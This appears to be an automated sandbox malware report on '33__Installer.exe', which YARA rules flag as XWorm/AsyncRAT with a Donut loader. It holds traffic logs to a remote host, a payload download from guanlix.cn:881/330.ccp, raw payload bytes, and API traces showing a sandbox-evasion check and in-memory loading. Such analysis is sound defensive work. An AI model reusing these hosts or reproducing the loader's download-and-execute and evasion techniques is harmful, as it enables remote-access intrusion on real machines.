Jul 2, 2024 19:26:41.099987030 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:50.411386013 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:50.548857927 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:52.099836111 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:52.104784012 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:52.422961950 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:26:52.425726891 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:26:52.430780888 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:05.221059084 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:05.225768089 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:05.544795990 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:05.547805071 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:05.552727938 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:07.814963102 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:08.033283949 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:08.073014021 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.073028088 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.073136091 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:08.078428984 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.391431093 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.393574953 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:08.398463964 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.670536041 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:08.672168970 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:08.677071095 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:20.971237898 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:21.097055912 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:21.097155094 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:21.097249031 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:21.098059893 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:21.098098993 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:21.100297928 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:21.420378923 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:21.424599886 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:21.429682016 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:34.096065044 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:34.100847960 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:34.418812037 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:34.421724081 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:34.426609039 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.097270012 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.102233887 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.421237946 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.436273098 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.441548109 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.533761024 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.538660049 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.614726067 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.619586945 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.627407074 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.632320881 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.645514965 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.650672913 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.675426960 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.680233002 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.768076897 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.772955894 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:39.783592939 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:39.788636923 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.030881882 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.033092022 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.037879944 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.258569002 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.261008024 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.265783072 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.265830994 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.270708084 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.270752907 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.276053905 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.485954046 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.487962961 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.492826939 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:40.492872000 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:40.497776031 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:44.080440044 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:44.085414886 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:44.403132915 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:44.406734943 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:44.415656090 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:50.409497023 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:50.455238104 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:56.049505949 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:56.054461002 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:56.221139908 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:56.226042032 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:56.378530025 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:56.410558939 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:56.415404081 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:56.606772900 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:56.617119074 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:56.622124910 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:57.611833096 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:57.616740942 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:57.935606956 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:57.937938929 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:57.943243027 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:59.455722094 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:59.460613012 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:59.778711081 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:27:59.914928913 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:27:59.920125961 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:02.768079042 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:02.773993015 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:02.799242020 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:02.804910898 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:02.908601999 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:02.913655043 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.091639042 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.093528032 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:03.098421097 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.320506096 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.322654009 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:03.327424049 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.548016071 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.627213955 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:03.686772108 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:03.692533970 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:03.699239016 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:03.706032991 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:04.061886072 CEST	7000	49731	117.41.184.33	192.168.2.4
Jul 2, 2024 19:28:04.062989950 CEST	49731	7000	192.168.2.4	117.41.184.33
Jul 2, 2024 19:28:04.068141937 CEST	7000	49731	117.41.184.33	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:23:57.804954052 CEST	56253	53	192.168.2.4	1.1.1.1
Jul 2, 2024 19:23:58.214560032 CEST	53	56253	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:23:57.804954052 CEST	192.168.2.4	1.1.1.1	0xc0a4	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:23:58.214560032 CEST	1.1.1.1	192.168.2.4	0xc0a4	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	91.208.240.157	881	6556	C:\Users\user\Desktop\33__Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:23:58.230568886 CEST	94	OUT	GET /330.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:23:59.166776896 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:23:42 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Wed, 12 Jun 2024 10:07:44 GMT Connection: keep-alive ETag: "66697370-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 58 6d fb 30 4e 7e 88 32 a2 6f 69 d3 f9 fa 9a de 2f 3a c5 c9 ab 23 45 fc ba f0 f2 a1 14 af 35 d5 00 00 00 00 72 d9 9a f4 56 15 83 7f 51 7f 5a 06 d3 a2 08 d5 c4 78 e4 ff 0d 47 a9 16 dd 99 d1 0c f7 ed 32 fd 17 06 ba cc 7c 27 cd 13 e0 cc a7 f0 a1 1a 42 09 75 fb 8a fd 5c ed d7 8f f9 64 23 f4 82 cc 3e 98 03 b5 94 ca 48 e1 dd 6e 27 f7 a4 ef b9 48 34 6e c9 db fe 57 ed ca b3 14 ff c2 bf 03 a0 6b e0 ef 3e da d5 95 a1 57 34 c2 8a e0 91 b8 e0 1e 77 84 18 4a a1 1f ae 5a 97 f2 ac 24 40 05 a3 e4 8c 84 2f bd d8 fb 8e 4d 3f 13 a7 3d 6f a6 13 ac 27 e9 83 b0 7a 1b da ed fb b0 24 e3 2e a3 c2 25 00 a0 83 d3 b9 59 bc 2e 22 14 29 0a 7c 94 3f e1 51 f3 3a 75 a6 5d 6c c0 c7 8c c7 c5 4c e6 47 50 1a 66 d7 8e b6 bd 2f 4c 89 69 7a 56 cc cf 6e c4 48 76 85 0e d7 7b 0a 55 61 90 78 e7 7f 42 56 95 4f 53 d5 16 a6 f7 7c 99 24 3b 8c f0 40 61 60 d2 d7 5f 16 05 bf f1 ae 8e 0b a2 9f d5 7d d9 df a3 f5 c7 6b 08 8c f3 b2 e2 4d e8 ee 27 28 1c 81 1d d8 be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: Xm0N~2oi/:#E5rVQZxG2\|'Bu\d#>Hn'H4nWk>W4wJZ$@/M?=o'z$.%Y.")\|?Q:u]lLGPf/LizVnHv{UaxBVOS\|$;@a`_}kM'((jYY2IPZPk<ATHYZIp37\<m`w(gw!)@{3h"l=jzZ^TVk^[WJ\s>WyNn"jXBdZLx {J1_\<p.NoND?=/Nr*X<8:PHMOt^\|"XE?iI'g]Ek(E]F,A}?tQ }5l\TT$NfHP9#3qKox~.kkhN;<_rm{oRp?-E

Target ID:	0
Start time:	13:23:56
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\33__Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\33__Installer.exe"
Imagebase:	0xc20000
File size:	247'808 bytes
MD5 hash:	8182ED62008E7526AE7E1F7D702FBCB6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4106753337.0000000006160000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4106039892.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	13.1%
Signature Coverage:	2.9%
Total number of Nodes:	647
Total number of Limit Nodes:	87

Executed Functions

Function 00C23910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00C23940
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00C23961
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239AF
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239E2
InternetCloseHandle.WININET(00000000), ref: 00C23A24
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C23A44
InternetCloseHandle.WININET(00000000), ref: 00C23A4D

Strings

Download, xrefs: 00C2393B

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Internet$CloseFileHandleOpenRead$Ios_base_dtorstd::ios_base::_
String ID: Download
API String ID: 3765100444-2171396134
Opcode ID: 145a3d9d9e6b4ac4b838fcd88fde54951e804457b8256cbe0fa16caa5e727552
Instruction ID: ae3c369be5da58f882f38a257ec630141c834e60b941d53cfcdb7fbb4ae0af68
Opcode Fuzzy Hash: 145a3d9d9e6b4ac4b838fcd88fde54951e804457b8256cbe0fa16caa5e727552
Instruction Fuzzy Hash: D131A171610369ABEB20DB94DC85FEE737CEB04B10F104168F51AB65D0DBB4AB84CB65

Function 0617A010 Relevance: 8.4, Strings: 6, Instructions: 888COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0617A406
(o^q, xrefs: 0617A872
(o^q, xrefs: 0617A53A
(o^q, xrefs: 0617A880
,bq, xrefs: 0617A8EA
,bq, xrefs: 0617A8F8

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-56095411
Opcode ID: d4c50eeb6d94ab4e5a4c40604068b411ca4a2c2610ae5338b0b77be0aa638678
Instruction ID: 615905b4f04c8c3017dba5536fd1d0075890dbf0de46f1b8b09045fa8b64cc38
Opcode Fuzzy Hash: d4c50eeb6d94ab4e5a4c40604068b411ca4a2c2610ae5338b0b77be0aa638678
Instruction Fuzzy Hash: 5E726174A00219DFDB54DFA9C844AAEBBF6BF88300F158569E805EB3A1DB31DD41CB90

Function 06177CB0 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 06177CCA
LR^q, xrefs: 061781C4

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID: LR^q$Xbq
API String ID: 0-1504435008
Opcode ID: 25c4d84802ddfd141ce49f017dc867ba1d36cb7c4548f75f139edbfb08811e9f
Instruction ID: 41d0c64e60352804ec4a38bcd2f8d6464b9baec4d8fc79da1b3b3cf52d355eb2
Opcode Fuzzy Hash: 25c4d84802ddfd141ce49f017dc867ba1d36cb7c4548f75f139edbfb08811e9f
Instruction Fuzzy Hash: B5C16370E04219CFDF9C5F6688582BDBAB2BFC8711F194D69D846E6288CF348C81CB65

Function 0617E920 Relevance: 2.2, Strings: 1, Instructions: 966COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0617F4A3

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 2f7d6c7e4d338100b075dec7673654edeca13cdfc8900df8ed6af35fbc934aba
Instruction ID: ea589dce67764f1e05205111f018da8ccc590656f4d7da342e30b0894176ee70
Opcode Fuzzy Hash: 2f7d6c7e4d338100b075dec7673654edeca13cdfc8900df8ed6af35fbc934aba
Instruction Fuzzy Hash: 18629134B10210CFDB98EB74D855B6E7BB7AF84700F218669E8069B3A4DF35DD468B81

Function 06174E68 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e565390850ac4ff7a8a515e1c3715bcbd7bec5defbe4dd8d8a05bafe4e1d60
Instruction ID: 2fe4608e8d5d5738ee560253025720a958159030740a65ebdb55b69f73ae5f83
Opcode Fuzzy Hash: 46e565390850ac4ff7a8a515e1c3715bcbd7bec5defbe4dd8d8a05bafe4e1d60
Instruction Fuzzy Hash: 4CB14D70E002098FDB54CFA9C9957DEBBF2EF88318F148529D815E7294EB749846CF91

Function 06175B40 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ee22c02aea3992203695b8cfbb82c0a989dc504dfdbee52083a5f348b9837f
Instruction ID: b5eea4a44a7866d0522ba1e0f2f9e66ebe87b94bd59c30284e8e051982709646
Opcode Fuzzy Hash: c2ee22c02aea3992203695b8cfbb82c0a989dc504dfdbee52083a5f348b9837f
Instruction Fuzzy Hash: 91B17E70E0020DCFDB54CFA9D9957ADBBF2AF88354F248529D818E7294EF349885CB81

Function 00C21210 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 87
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00C2121F
Sleep.KERNEL32(0000012C), ref: 00C21228
GetTickCount64.KERNEL32 ref: 00C2122E

Part of subcall function 00C24E4E: __vwprintf_l.LIBCMT ref: 00C24E5C

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00C21278
GetFileSize.KERNEL32(00000000,00000000), ref: 00C21283
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00C21295
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C212A7
CloseHandle.KERNEL32(00000000), ref: 00C212AE

Strings

sandbox!!!, xrefs: 00C21254
v4:%d, xrefs: 00C2123E
C:\Users\Public\Downloads\ind.jpg, xrefs: 00C21273

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.jpg$sandbox!!!$v4:%d
API String ID: 1694741105-2668386317
Opcode ID: e460d6ec3224e75e7a4c69b08d48bd6085e2ef808c2631736f9c7e00a9ac5834
Instruction ID: bd8948a2e588f026088db30cb350f1e74a09fd60061ff16accf0695ed7d79e31
Opcode Fuzzy Hash: e460d6ec3224e75e7a4c69b08d48bd6085e2ef808c2631736f9c7e00a9ac5834
Instruction Fuzzy Hash: 8F119637A542147BE62097F96D0EFDE7B68DB8AB31F200521FB05E72D0D9F4590082E5

Function 03CAFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,03CAFCB5,00000000), ref: 03CAFFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03CAFCB5,00000000), ref: 03CB0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03CB0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03CB0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03CB00BD

Memory Dump Source

Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 491c4cc15db236f53dcacf44dae9e0268d9878801db9c5877768547230b15511
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: DD21C2B620130A6FD330DA659C48EBBB7FCEB84301F08083EBA46D2450EB75E6088760

Function 03CB00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03CB011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03CB014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03CB0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03CB01A3

Memory Dump Source

Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: 965d72bfd31e57ed24702ce626153186c9cc59e224517eb2fd668f30b0f30ee6
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: 2B21B3B32007596FE324DA61CC88EBBB7FCEB88200F08483DBA97D5551EB76E5058620

Function 00C23A70 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C211E0: __time64.LIBCMT ref: 00C211E3
Part of subcall function 00C211E0: _rand.LIBCMT ref: 00C211F6
Part of subcall function 00C211E0: _rand.LIBCMT ref: 00C211FB

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00C23A84

Part of subcall function 00C23910: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00C23940
Part of subcall function 00C23910: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00C23961
Part of subcall function 00C23910: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239AF
Part of subcall function 00C23910: InternetReadFile.WININET(00000000,?,00001000,?), ref: 00C239E2
Part of subcall function 00C23910: InternetCloseHandle.WININET(00000000), ref: 00C23A24
Part of subcall function 00C23910: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C23A44
Part of subcall function 00C23910: InternetCloseHandle.WININET(00000000), ref: 00C23A4D

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00C23AA6

Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21756
Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21776
Part of subcall function 00C21740: _wprintf.LIBCMT ref: 00C21796

Part of subcall function 00C21210: GetTickCount64.KERNEL32 ref: 00C2121F
Part of subcall function 00C21210: Sleep.KERNEL32(0000012C), ref: 00C21228
Part of subcall function 00C21210: GetTickCount64.KERNEL32 ref: 00C2122E
Part of subcall function 00C21210: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00C21278
Part of subcall function 00C21210: GetFileSize.KERNEL32(00000000,00000000), ref: 00C21283
Part of subcall function 00C21210: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00C21295
Part of subcall function 00C21210: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C212A7
Part of subcall function 00C21210: CloseHandle.KERNEL32(00000000), ref: 00C212AE

Strings

C:\Users\Public\Downloads\ind.jpg, xrefs: 00C23A8A
